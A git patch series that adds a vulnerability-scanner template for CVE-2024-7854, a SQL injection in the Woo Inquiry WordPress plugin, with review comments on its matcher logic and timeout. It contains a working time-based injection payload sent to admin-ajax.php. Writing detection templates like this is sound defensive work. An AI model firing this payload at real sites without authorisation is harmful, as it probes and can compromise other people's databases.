From 1494e4eb42a09c20998932eec64e0782fddeef12 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Fri, 4 Oct 2024 21:34:24 +0300
Subject: [PATCH 1/2] add CVE-2024-7854
---
 http/cves/2024/CVE-2024-7854.yaml | 60 +++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-7854.yaml
diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml
new file mode 100644
index 0000000000..5e3a15b092
--- /dev/null
+++ b/http/cves/2024/CVE-2024-7854.yaml
@@ -0,0 +1,60 @@
+id: CVE-2024-7854
+
+info:
+ name: Woo Inquiry <= 0.1 - SQL Injection
+ author: s4e-io
+ severity: critical
+ description: |
+ The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/RandomRobbieBF/CVE-2024-7854
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/312a6601-c914-4661-82ff-6f8bac849442?source=cve
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-7854
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-7854
+ cwe-id: CWE-89
+ epss-score: 0.00091
+ epss-percentile: 0.39655
+ cpe: cpe:2.3:a:sjhoo:woo_inquiry:0.1:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: sjhoo
+ product: woo_inquiry
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/woo-inquiry"
+ tags: cve,cve2024,wp-plugin,sqli
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body,"/wp-content/plugins/woo-inquiry")'
+ - 'status_code == 200'
+ condition: and
+ internal: true
+
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a)
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains(content_type, "text/html")'
+ - 'status_code == 200'
+ condition: and
From 098b89ed27331d87ffcdbbdf90b525efcc863b7a Mon Sep 17 00:00:00 2001
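Review bot: The second matcher treats any `/wp-admin/admin-ajax.php` response slower than six seconds (`- 'duration>=6'`) as a confirmed injection, with no control measurement, so a WordPress host that is merely slow will be reported as a critical SQL injection. Since the template already uses `flow`, a control request with the same `action` and a non-sleeping `dbid` could precede the probe so the finding is raised only when the sleeping request is measurably slower; if the engine cannot compare durations across requests, at least bound the window, e.g. `- 'duration>=6 && duration<=12'`, so a stalled response is not mistaken for the 6 s SLEEP. The `status_code == 200` and `text/html` conditions add little evidence — the delay is the signal, and a handler that errors out after the SLEEP would still have executed it — so they are more likely to suppress true positives than to filter false ones. The payload is a pure delay and extracts nothing, which is the right choice for a scanner template.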
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 8 Oct 2024 10:30:46 +0400
Subject: [PATCH 2/2] Update CVE-2024-7854.yaml
---
 http/cves/2024/CVE-2024-7854.yaml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml
index 5e3a15b092..66fb667893 100644
--- a/http/cves/2024/CVE-2024-7854.yaml
+++ b/http/cves/2024/CVE-2024-7854.yaml
@@ -25,7 +25,7 @@ info:
 product: woo_inquiry
 framework: wordpress
 publicwww-query: "/wp-content/plugins/woo-inquiry"
- tags: cve,cve2024,wp-plugin,sqli
+ tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry
 flow: http(1) && http(2)
@@ -39,12 +39,11 @@ http:
 - type: dsl
 dsl:
 - 'contains(body,"/wp-content/plugins/woo-inquiry")'
- - 'status_code == 200'
- condition: and
 internal: true
 - raw:
 - |
+ @timeout: 20s
 POST /wp-admin/admin-ajax.php HTTP/1.1
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
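Review bot: The new `@timeout: 20s` sits inside the `- |` literal block, so a `#` comment explaining why 20 s was chosen cannot be placed next to it without being sent as part of the HTTP request; put the explanation on the enclosing list item instead, e.g. `- raw: # 20s must outlast the SLEEP(6) in the payload plus normal admin-ajax latency`. Nothing otherwise ties the timeout to the `SLEEP(6)` in the request body two lines below it, and the two values will drift apart the first time the payload is retuned. The matcher that consumes this request lies after the hunk and, from the first commit, presumably still requires only `duration>=6`, so the longer timeout widens rather than narrows the window in which an unrelated slow response is accepted as a positive.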